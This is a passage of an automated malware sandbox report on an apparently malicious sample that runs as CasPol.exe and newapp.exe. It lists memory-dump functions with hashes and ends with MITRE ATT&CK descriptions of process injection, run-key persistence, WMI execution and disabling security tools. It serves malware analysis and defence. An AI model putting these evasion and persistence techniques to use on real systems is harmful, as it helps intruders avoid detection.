Opcode Fuzzy Hash: 9e5b0473d0b0efba3fe83a56254000cfd734ee386bb30d30a96b1e568e53cae7
Instruction Fuzzy Hash: 66E0ED75B001298B8F48FBB8D4584DCB3E2FF88114B4180A6D606E7754EE34DC168B71

Uniqueness

Uniqueness Score: -1.00%

Function 05E9F39F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acf8a37a43f86dca90afe16cb134910bb872af2641fb8d9ecade70d73f5cb376
Instruction ID: 6d8d3be999bee8df6e0c5c5f1900aacfd55b193b72522a9d8e9d6a76b43cee84
Opcode Fuzzy Hash: acf8a37a43f86dca90afe16cb134910bb872af2641fb8d9ecade70d73f5cb376
Instruction Fuzzy Hash: 3FE0E575B001288B8F44FBBDD8488DDB3E2FB88214B4240A6D60AE7754EE24DC128B71

Uniqueness

Uniqueness Score: -1.00%

Function 05E94AE0 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e48649e3214e01cb6ec574464b8696bc9459417742f1ad884a4cacb2fe32a6
Instruction ID: 6ca8426f5501d93dff4e12fcb4bfd3a17fb1c12cd8f1d3f06d5d5b889252f850
Opcode Fuzzy Hash: c2e48649e3214e01cb6ec574464b8696bc9459417742f1ad884a4cacb2fe32a6
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05E9CA68 Relevance: 3.1, Strings: 1, Instructions: 1822COMMON

Download Yara Rule

Strings

D!%l, xrefs: 05E9CC63

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID: D!%l
API String ID: 0-2689253685
Opcode ID: fef1f5028d4e28edb0a4352dc23449c7faa994bc1d34ba998963ddf13fad7bef
Instruction ID: 1b6643117ab61fdef4de5a8f719f76579497594207f3d3c67c0cca484bca89fc
Opcode Fuzzy Hash: fef1f5028d4e28edb0a4352dc23449c7faa994bc1d34ba998963ddf13fad7bef
Instruction Fuzzy Hash: 5213F970D106198ECB24EF68C884AEDF7B1FF99300F15D69AD549AB251EB30AAC5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 023F6D20 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

D0)l, xrefs: 023F702C

Memory Dump Source

Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd

Similarity

API ID:
String ID: D0)l
API String ID: 0-287000446
Opcode ID: 3593761b648d36c47c83428ca0ace1591927e4a569080398b9174329df63ff65
Instruction ID: 425c7a46f9c9715d648184668b604ade5e58019ab49488b0042e66655a15e1a2
Opcode Fuzzy Hash: 3593761b648d36c47c83428ca0ace1591927e4a569080398b9174329df63ff65
Instruction Fuzzy Hash: AC91D534B043188BCB489F75A86577E7AABBFC9204B06C86AE516D7394CF39C801CB95

Uniqueness

Uniqueness Score: -1.00%

Function 05DF84B8 Relevance: .8, Instructions: 810COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b29174b5ee6db67d8a4fac4dc08afaef5de1c1081a32e568019a87c755a9fc
Instruction ID: f56d5aa6d085f335d1d0be21ecdedafdbd4c9e0cc69c0166303ef99f1df570f3
Opcode Fuzzy Hash: d3b29174b5ee6db67d8a4fac4dc08afaef5de1c1081a32e568019a87c755a9fc
Instruction Fuzzy Hash: 69627E34A402148FDB15EB74D8987ADBBB3EF88314F1584AAE50ADB345DF389D828F51

Uniqueness

Uniqueness Score: -1.00%

Function 05DF8408 Relevance: .8, Instructions: 803COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876aa0e683004fb3a9300fd8a8005d7bd3f1fccebe768dd9aa0117746ccd47bf
Instruction ID: 9dc66f8b5433786834dbcbe567783ecbde9ccb34a62b19f4b51c3f8671fd0d28
Opcode Fuzzy Hash: 876aa0e683004fb3a9300fd8a8005d7bd3f1fccebe768dd9aa0117746ccd47bf
Instruction Fuzzy Hash: 05627034A402148FDB15EB74D898BADBBB3EF88314F1584AAD50ADB345DF389D828F51

Uniqueness

Uniqueness Score: -1.00%

Function 05DFD9A8 Relevance: .6, Instructions: 639COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd20de38de0a6a503fffa862d8187d9474c99113dcbadd4bacb23fd272c3a45
Instruction ID: f490f1d7a4515ec00701d0e224516073483957b5a4e6332e8472b969c7cd9764
Opcode Fuzzy Hash: bdd20de38de0a6a503fffa862d8187d9474c99113dcbadd4bacb23fd272c3a45
Instruction Fuzzy Hash: E9420A70A002188FDB68DB78C854B9EB7F2EF88214F1185AAD50AEB751EB349D45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05DFB4E0 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc361216c9ef75b5f0a22c39285896b361ee0dda8be6ff1a9f163735d1176258
Instruction ID: 5bf50ac4b2a783d9930597b3dec5ce21e20c713112a682eaeccfc55173f35e9f
Opcode Fuzzy Hash: cc361216c9ef75b5f0a22c39285896b361ee0dda8be6ff1a9f163735d1176258
Instruction Fuzzy Hash: 6B020A30A002288FDB58EBB8D854BADB7F2BF88208F1184AAD50ADB755DF349D45CF51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: newapp.exePID: 4272, Parent PID: 3452COMMON

Executed Functions

Function 01130958 Relevance: 2.9, Strings: 1, Instructions: 1635COMMON

Download Yara Rule

Strings

P, xrefs: 0113098A

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 21a06c3f9e5fc8608cd6926f6845a86b093a35aac77d625d8eb4c57b5d90b7ec
Instruction ID: c2ccf2ab748df2b99d4a341c43e0b414cd38015bba306dbffbcb9d6d4da22d87
Opcode Fuzzy Hash: 21a06c3f9e5fc8608cd6926f6845a86b093a35aac77d625d8eb4c57b5d90b7ec
Instruction Fuzzy Hash: B132B5316002149FD709EF78D854A6D7BB2FF89304F1685AAE5059B3A6CF34EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011302DC Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

$,)l, xrefs: 01130474

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID: $,)l
API String ID: 0-1057090153
Opcode ID: 1ff7d1262ec571d9a912a578282f93601b05dde35f6c6b427dea801d2563ebca
Instruction ID: 1e28f7ac48a4e9113d26edb45a2c0e2660ffd154afb6feb23d906d2955022c3a
Opcode Fuzzy Hash: 1ff7d1262ec571d9a912a578282f93601b05dde35f6c6b427dea801d2563ebca
Instruction Fuzzy Hash: 6A317274A0528CAFDB09EF79D85074A7FB2EBC9204F15C4BBC804A7269DF351906DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0113094C Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

P, xrefs: 0113098A

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 80991de61eccbd51a375a850e09a57d4b078fe9d7a97fa649c1ecaf387f35886
Instruction ID: bbe352d4c9d531a785481a17ca4f76b5e4e6e6b156d82b7fba18d7f36bb9c865
Opcode Fuzzy Hash: 80991de61eccbd51a375a850e09a57d4b078fe9d7a97fa649c1ecaf387f35886
Instruction Fuzzy Hash: F6419530B102149FDB18DB64C4507AEB7F2FF88708F14866DE406AB395DB71AC46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01130448 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

$,)l, xrefs: 01130474

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID: $,)l
API String ID: 0-1057090153
Opcode ID: 1b56f55a19bc6db27502e4064babc946cde8b4e6dcb2ba0767afdac7eeabd733
Instruction ID: 8524371d64ca4601363e70ebfb856ae086c45552362a557d5264ca78bc464c1c
Opcode Fuzzy Hash: 1b56f55a19bc6db27502e4064babc946cde8b4e6dcb2ba0767afdac7eeabd733
Instruction Fuzzy Hash: E8212374A0564CAFDB09EF6AD84474ABBB3EBCC204F10C47A8904A7369DF356907DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01130708 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3d8c42cf5fe55ac51b6c2f5956f6561689d1c2c940ce2ac039a1f60a86fb07
Instruction ID: 0d7dac43d2a78aa56e2790f60cf475b99f351b88632d147f74f5cd6a3a318fab
Opcode Fuzzy Hash: cc3d8c42cf5fe55ac51b6c2f5956f6561689d1c2c940ce2ac039a1f60a86fb07
Instruction Fuzzy Hash: D6417374B10218AFCB19EB74D898BAE77F2EF8D704B108559E505A7364DF309846DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01130C40 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033102e7e5517594708e0ede99e825220808b1a03158e1a87fb57c6eefb231fc
Instruction ID: 66c511d9339992f07436a1e648a09fc3e8689e207094b63d9572e29fb5f8afe0
Opcode Fuzzy Hash: 033102e7e5517594708e0ede99e825220808b1a03158e1a87fb57c6eefb231fc
Instruction Fuzzy Hash: 2131E734A082589FCB15EB78D8659AF7FB1EF89204F1180BED545DB3A6CB344D06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01130AF0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b14730c5516d9b318bd752c9b8a5c9686b583e1c7886f9cc2e96e57f80de77b
Instruction ID: c76aa64a30cfa7a4a97939ae9cbc6d059ce5fa1e991e108a1206dda4a665efc5
Opcode Fuzzy Hash: 8b14730c5516d9b318bd752c9b8a5c9686b583e1c7886f9cc2e96e57f80de77b
Instruction Fuzzy Hash: F52135307082549FDB1A9F799810B5A7BE4EFC6218B1485ABE458CB79ACF30DC46C751

Uniqueness

Uniqueness Score: -1.00%

Function 011305F0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8df469bd74ad5882ebf924188361b29d5906f7f0b942288989a4e3d2dfb2143
Instruction ID: ce27b73220211a383f27d95278a9901623305536381de4a222eda190c47e7599
Opcode Fuzzy Hash: d8df469bd74ad5882ebf924188361b29d5906f7f0b942288989a4e3d2dfb2143
Instruction Fuzzy Hash: 652198717105508FCB09EB38C4A4A6D37E2AFC961932600A8E50ACF7B6CF26DC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0113086F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeea2dc5ed76a5e40460094cb1794809de7a882b01130980be194dbf4217f058
Instruction ID: a54fdd815d7b56466450079cfddc971ee0f2c079b460bb2714960094bbbf4066
Opcode Fuzzy Hash: eeea2dc5ed76a5e40460094cb1794809de7a882b01130980be194dbf4217f058
Instruction Fuzzy Hash: C4119574E01209DFDB18DB64E558BAD7BF2AF8D205B108459E516E7364DF309805DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01130569 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908fc902df565aebdef21adb8a9f5d5b036f415f7aef2730b99663c2f9145836
Instruction ID: 25341c18818b753c9820afe66ff58a992342c8cd4a7b6f3adc77ed2df4e6da71
Opcode Fuzzy Hash: 908fc902df565aebdef21adb8a9f5d5b036f415f7aef2730b99663c2f9145836
Instruction Fuzzy Hash: AE01AD72900209DFCB58EFB8E859A6E7BB1FB48311B10856BE416D32A0DB30D802DF50

Uniqueness

Uniqueness Score: -1.00%

Function 01130578 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1130000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940dfa85df32ffe90b9766770e3f7e4ba06d660715a23c66ae52515c010fdc0c
Instruction ID: ad3f0babb14155fcb822d23736cbbd464b0189b14cd29700c073f0a34b6e5971
Opcode Fuzzy Hash: 940dfa85df32ffe90b9766770e3f7e4ba06d660715a23c66ae52515c010fdc0c
Instruction Fuzzy Hash: 55018C75A00218DFCB48EFB8E84896E7BB5FB48311B11856BE41AD32A0DB30D902DF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: newapp.exePID: 676, Parent PID: 3452COMMON

Executed Functions

Function 00C00958 Relevance: 2.9, Strings: 1, Instructions: 1629COMMON

Download Yara Rule

Strings

P, xrefs: 00C0098A

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: daea71f066353fdf6e3f077494f7f1dfff9d046ea8d280eea365b05d104c2740
Instruction ID: f68c4cc63705ccaa6bd65b0262f40380845ebabb62ff9fb1cce63092e585f395
Opcode Fuzzy Hash: daea71f066353fdf6e3f077494f7f1dfff9d046ea8d280eea365b05d104c2740
Instruction Fuzzy Hash: 2C32A2317002158FDB14EBB4D854BADBBB2BF88314F16C5A9D5169B3A2CB34EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C002DC Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

$,)l, xrefs: 00C00474

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID: $,)l
API String ID: 0-1057090153
Opcode ID: e0616d8788964dd0386e10962b8cc42d8d922f3fecc7aac820ed962eb13fc3a7
Instruction ID: ec1cdaf00c2aa160a165d28e35549655dd57992bdf5e21de3736a7549aeb9c87
Opcode Fuzzy Hash: e0616d8788964dd0386e10962b8cc42d8d922f3fecc7aac820ed962eb13fc3a7
Instruction Fuzzy Hash: C73175B4A04688AFE709EFB5DC407497BB3ABCD204F15C5ABC4449736ADB381907CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C0094C Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

P, xrefs: 00C0098A

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 9b1f7af88206acfd80d99bab14792d2468e0d895aca7602419b667fca0104b77
Instruction ID: 4b7408720de36d475abd234e03938ad7dea547c05fbdc2c6fb895a247319a441
Opcode Fuzzy Hash: 9b1f7af88206acfd80d99bab14792d2468e0d895aca7602419b667fca0104b77
Instruction Fuzzy Hash: 8E41B531B102189FDB14DB64C451BAEB7B2FF88308F25C66DE416AB391DB71AC46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00C00448 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

$,)l, xrefs: 00C00474

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID: $,)l
API String ID: 0-1057090153
Opcode ID: e7b1a8de21c432d3616491ad3e6deca274ad4035a5a907577280be8f0ac23dfa
Instruction ID: 2bf1ae86a502913d2acb58d1b5dda773364ce110c350e010848c612eca150f56
Opcode Fuzzy Hash: e7b1a8de21c432d3616491ad3e6deca274ad4035a5a907577280be8f0ac23dfa
Instruction Fuzzy Hash: 06212E74A0464CABE709EFBAD940749BBB3ABCC204F11C66AD90897369DB385907CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C00708 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38d768b7810e694396f29588fba295722521ec8f3cedce23038fd5b3247aaa7
Instruction ID: 1ef7b71d21bc394f7ec0a26c1c6ba0a57c9ad60bd3e158b3aa629e1b577dac51
Opcode Fuzzy Hash: e38d768b7810e694396f29588fba295722521ec8f3cedce23038fd5b3247aaa7
Instruction Fuzzy Hash: D8416235B10215AFDB05EB70D898BAE77B2BF8D704F218519E506E73A1DF34A846CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C00718 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16ce778e7a3898ab66dcf1e272a05f75ca121106e829e18052b2d7da809a6e5
Instruction ID: 10314c56f929f561c267da7bb9a37a30517aa6f6ce06f24e643d1bc867926092
Opcode Fuzzy Hash: b16ce778e7a3898ab66dcf1e272a05f75ca121106e829e18052b2d7da809a6e5
Instruction Fuzzy Hash: 08416E35B00215EFDB04EBB0D898BAE77B2BF8D704F218519E506973A1DF34A846CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C00C40 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd0dec69d9effa7c708770b6f9aa4d3cebfc0a44d8e88d3d5ec6f3b191a9d96
Instruction ID: 3187822565499bcb62111e2a1613ad7d6708c534435c970bbe8b375220beec04
Opcode Fuzzy Hash: efd0dec69d9effa7c708770b6f9aa4d3cebfc0a44d8e88d3d5ec6f3b191a9d96
Instruction Fuzzy Hash: CE31E734A042589FCB04EB74D854AAE7BB1EF89304F2180BAD945DB392CB349D05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C00C50 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13defbecc2ef76428e9d820addbf0247169e926629c3ae3ec83c15dc4785791b
Instruction ID: 2fc98d57201c215bebc00a9ec22b9cdb18670b987a70e1dcb4fcbd2673f912bb
Opcode Fuzzy Hash: 13defbecc2ef76428e9d820addbf0247169e926629c3ae3ec83c15dc4785791b
Instruction Fuzzy Hash: 4331C634A042589FCB04EBB4D850AAF7BB1EF89304F21806AD919DB391CB349D05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C00AF0 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99da04df7285442b7dc7f0b9d2a8922d570abe2132b49bb6a678bb9351fbd972
Instruction ID: 270dd0a50fca58cb4a680773bde45deb8ae94d78615e00a956304dbb4bffb1cc
Opcode Fuzzy Hash: 99da04df7285442b7dc7f0b9d2a8922d570abe2132b49bb6a678bb9351fbd972
Instruction Fuzzy Hash: 532102302042519FDB159BB9D81075A7BE5AFC6318F2685BAD458CB792DF30DC46C781

Uniqueness

Uniqueness Score: -1.00%

Function 00C00600 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f89caddb840484f35a028c561820376cc76fc34dcd99e9835e4c63e1dcc9d25c
Instruction ID: 4911be117a5c214446659988dd6ba11bd77bcdac663b6369f3464e2c1abbce41
Opcode Fuzzy Hash: f89caddb840484f35a028c561820376cc76fc34dcd99e9835e4c63e1dcc9d25c
Instruction Fuzzy Hash: D81126753001148FCB48EB38C464A6D33E2AF8962971604A8E90ACF7B1DF36DC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C0086F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b235a4e97bee036c8a5787ca26a73c4e6203327a790c7fa367ef81036a8122
Instruction ID: 4f625bb568de72ebb152c4fb4a3f9d384d3dd698bdc3f2cacba14fb4010ed3e9
Opcode Fuzzy Hash: 17b235a4e97bee036c8a5787ca26a73c4e6203327a790c7fa367ef81036a8122
Instruction Fuzzy Hash: 5811A534E05205DFDB08EBA0E598BAD7BB2AF49309F218429E516E73A1DF349D05CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C00569 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad638d9f5f629512a8d5cf01f286cd95791c155a1d7598e4edc374911ffdbd1
Instruction ID: 84d2b38059cfe198f38e04fad99a3a3b407a50a2cd95f65f8c3d570b309f3e7d
Opcode Fuzzy Hash: bad638d9f5f629512a8d5cf01f286cd95791c155a1d7598e4edc374911ffdbd1
Instruction Fuzzy Hash: A901AD71D00204DFCB48EFB4EC086AA7BB5BF08310B20856AE856D3291DB34D902CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C00578 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c00000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2370ba09e00a159f2bca652b23001099251ed47aca459aafb88e2c984db9de
Instruction ID: c37fbc57866bd79d4219c7a7019a77aba9afc4796155e0a35ab0759027305163
Opcode Fuzzy Hash: 7b2370ba09e00a159f2bca652b23001099251ed47aca459aafb88e2c984db9de
Instruction Fuzzy Hash: E8018175A04215DFCB48EFB8EC086AE7BB5FB08311B21856AE416D3290DB34C902CF94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

